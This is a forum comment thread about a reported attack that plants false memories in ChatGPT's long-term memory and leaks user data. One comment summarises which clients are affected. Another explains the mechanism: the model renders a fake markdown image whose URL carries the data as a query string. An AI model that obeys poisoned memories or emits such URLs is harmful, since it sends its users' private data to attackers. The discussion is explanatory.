I don’t know anything about tech, so please bear with your mom’s work friend (me) being ignorant about technology for a second.
I thought the whole issue with generative ai as it stands was that it’s equally confident in truth and nonsense, with no way to distinguish the two. Is there actually a way to get it to “remember” true things and not just make up things that seem like they could be true?
The memory feature of ChatGPT is basically like a human taking notes. Of course, the AI can also use other documents as reference. This technique is called RAG. -> https://en.wikipedia.org/wiki/Retrieval-augmented_generation
Sidenote. This isn’t the place to ask technical questions about AI. It’s like asking your friendly neighborhood evangelical about evolution.
tldr
- it affects the desktop app of chatgpt, but likely any client that features long term memory functionality.
- does not apply to the web interface.
- does not apply to API access.
- the data exfiltration is visible to the user as GPT streams the tokens that form the exfiltration URL as a (fake) markdown image.
false memories in ChatGPT
How is the application able to send data to any website? Like even if you as the legit user explicitly asked it to do that?
Haven’t read details, but the classic way is to have a system visit: site.com/badimage.gif?data=abcd
Note: That s is also how things like email open rates are tracked, and how marketers grab info using JavaScript to craft image URLs.
This is why every single email client for the past 2+ decades blocks external images? This didn’t occur to the AI geniuses?
IME they usually proxy and/or prefetch images for caching instead of blocking them. Only spam content is blocked by default.
I don’t understand. Why can’t ChatGPT be a good bot and keep a secret?
It’s a very OpenAI
emails
Look: if the article can’t pluralize properly, I’m out.
Am I missing something? Isn’t “emails” correct?
What is the plural of mail? ;)
Mails… And the plural of email is emails, so what is the problem?